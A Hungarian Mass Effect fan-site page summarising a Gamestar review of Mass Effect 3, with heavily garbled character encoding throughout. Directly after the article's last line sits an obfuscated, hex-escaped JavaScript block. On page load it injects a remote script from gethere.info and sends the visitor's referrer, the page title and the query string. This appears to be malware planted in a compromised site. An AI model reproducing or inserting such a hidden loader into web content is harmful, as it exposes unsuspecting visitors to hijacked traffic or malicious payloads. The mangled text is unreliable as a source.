Üdvözlünk az SFportal nem hivatalos Mass Effect rajongói oldalán!

Kövess minket!



Vagy kérj e-mail értesítőt!

Enter your email address:

Delivered by FeedBurner

Mass Effect @ Google+

Mass Effect @ Facebook

A hivatalos magyar Mass Effect Facebook oldal

Csatlakozz!

A Gamestar magazin nA�met kiadA?sA?ban megjelent egy Mass Effect 3 teszt, amit a Bioware Social Network egy fA?rumozA?ja volt olyan kedves, A�s angol nyelven A�sszefoglalt nA�hA?ny cA�mszA?ban. LA?ssuk, miket A�rtak.

  • A fA� kA?ldetA�s kb. 15-20 A?ra hosszA?sA?gA?
  • Minden mellA�kkA?ldetA�ssel egyA?tt kb. 40 A?ra a Mass Effect 3 vA�gigjA?tszA?sa
  • Nincsenek elvarratlan szA?lak, nincs cliffhanger, a Bioware tartotta magA?t ahhoz, hogy teljesen lezA?rja Shepard trilA?giA?jA?t.
  • TA�bb, mint 100 kA?lA�nbA�zA� jelenet, beszA�lgetA�s vagy egyA�b esemA�ny van, amit befolyA?solnak a dA�ntA�seink; ezek lehetnek kisebb fajsA?lyA? vA?ltozA?sok (valaki megkA�szA�ni Shepardnak, hogy vA�grehajtott egy kA?ldetA�st), meg nagyon komoly, tA�rtA�netet befolyA?solA? kA�vetkezmA�nyekkel is jA?rhatnak, amiket nyilvA?n a Gamestar sem akart elspoilerezni. Ezeket a kA�vetkezmA�nyeket nem mindig fogjuk szeretni.
  • SPOILER [jelA�ld ki a szA�veget az olvasA?shoz]: A szA�vetsA�gesek gyA�jtA�sA�hez sok kA?lA�nbA�zA� kA?ldetA�st meg kell csinA?lni, tA�bbek kA�zA�tt megoldA?s kell talA?lni a krogan genophage problA�mA?ra, meg kell A�pA�tenA?nk egy Prothean fegyvert, hatA?stalanA�tani kell egy Cerberus bombA?t, mielA�tt elpuszA�tena egy fA�l holdat, A�s virtuA?lisan be kell jutnunk egy szA?mA�tA?gA�pes programba is. SPOILER VA�GE
  • A�AttA?l fA?ggA�en, hogy mennyi kA?ldetA�st csinA?lsz meg, vA?ltozik a jA?tA�k befejezA�se, meghatA?rozza, kik A�lik tA?l a Mass Effect 3-at (lA?sd bA�vebben a Galaxy at War-rA?l szA?lA? cikkA?nket)
  • BA?r a jA?tA�k A�lvezhetA� az A?j jA?tA�kosok szA?mA?ra is, a cikkA�rA? mindenkA�ppen azt javasolja, hogy elA�bb a Mass Effect 1-2-t jA?tsszuk vA�gig
  • Az ME3 “Role-Play”-mA?dja teljesen Mass Effect 1 A�rzetet ad a jA?tA�knak.
  • A jA?tA�k rengeteg lehetA�sA�get ad Shepard testreszabA?sA?nak. Minden karakterosztA?lynak van 8 kA�pessA�ge, mindegyik kA�pessA�gnek 6 szintje van, a kA�pessA�gek negyedik szintjA�tA�l kezdve pedig specializA?lA?dhatunk (ahogy ezt a demA?ban is lA?thattuk).
  • A fegyverek testreszabA?sa is A�rdekes, fontos, de tulajdonkA�ppen kevA�s hatA?sa van a mA?dosA�tA?soknak
  • A jA?tA�kegyensA?ly nem egA�szen optimA?lis a szerzA� szerint
  • A jA?tA�k Medium beA?llA�tA?s felett A�rezhetA�en nehezebb, ugyanakkor az ellenfelek mestersA�ges intelligenciA?ja nem annyira fejlett
  • SPOILER [jelA�ld ki a szA�veget az olvasA?shoz] Eljutunk krogan romokhoz, feljutunk egy geth hajA?ra, A�s meglA?togatjuk a turiA?n Palaven holdjA?t is, meg rengeteg egyA�b helyet. SPOILER VA�GE.
  • TA�bb helyen is A?t kell vennA?nk egy-egy A?gyA? irA?nyA�tA?sA?t, ahogy azt a korA?bbi elA�zetesekben lA?thattuk.
  • A pA?lyA?k felA�pA�tA�se hasonlA�t az ME2-hA�z, amit a szerzA� nem tart tA�kA�letesnek, de a jA?tA�kmenet gA�rdA?lA�keny, izgalmas, drA?mai – legfA�kA�ppen a tA�rtA�netnek A�s a dialA?gusoknak kA�szA�nhetA�en, amiket nagyon jA?nak tart.Rengeteg kisebb-nagyobb vA?lasztA?si lehetA�sA�gA?nk van.
  • A bolygA?k szkennelA�se nem annyira unalmas, mint az ME2-ben, mivel gyorsabban is mA�kA�dik, valamint egy A?j minijA?tA�kot tartalmaz. SPOILER [jelA�ld ki a szA�veget az olvasA?shoz] Amikor belA�pA?nk egy rendszerbe, akkor A�szrevA�tlenek vagyunk, kA�szA�nhetA�en a Normandy A?lcA?zA?technolA?giA?jA?nak. Ugyanakkor minA�l tA�bbszA�r szkennelA?nk egy bolygA?t, annA?l nagyobb esA�lyA?nk van arra, hogy egy KaszA?s hajA? felfigyel rA?nk – ekkor indul egy minijA?tA�k, amikor el kell menekA?lnA?nk. SPOILER VA�GE.
  • Az A?j kA�zelharci tA?madA?sok szA?rakoztatA?ak, de tA?lzottan erA�sek.
  • A jA?tA�k grafikA?ja nem a legtA�kA�letesebb.
  • Nagyon jA?, dinamikus zenA�je A�s hanghatA?sai vannak a jA?tA�knak.
  • prod 166.

  • A hA?borA?s erA�feszA�tA�seink folyamatosan nyomonkA�vethetA�ek a Normandy egyik terminA?ljA?n.

A�sszefoglalva: a jA?tA�k az ME2 erA�ssA�geire A�pA�t, de visszahoz nA�hA?ny dolgot az ME1-bA�l is, ezA?ltal a sorozat legA?tA�sebb darabjA?t kA�szA�tette el a Bioware.

PONTSZA?M: 9/10

Hang: 10/10
KA?ldetA�sek / tA�rtA�net: 10/10
Karakterek: 10/10
Harc: 8/10
EgyA�b: 9/10

MA?rciusban meglA?tjuk, igaza van-e a tesztelA�nek. :)var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Elnézést, a hozzászólás ezen a részen nem engedélyezett.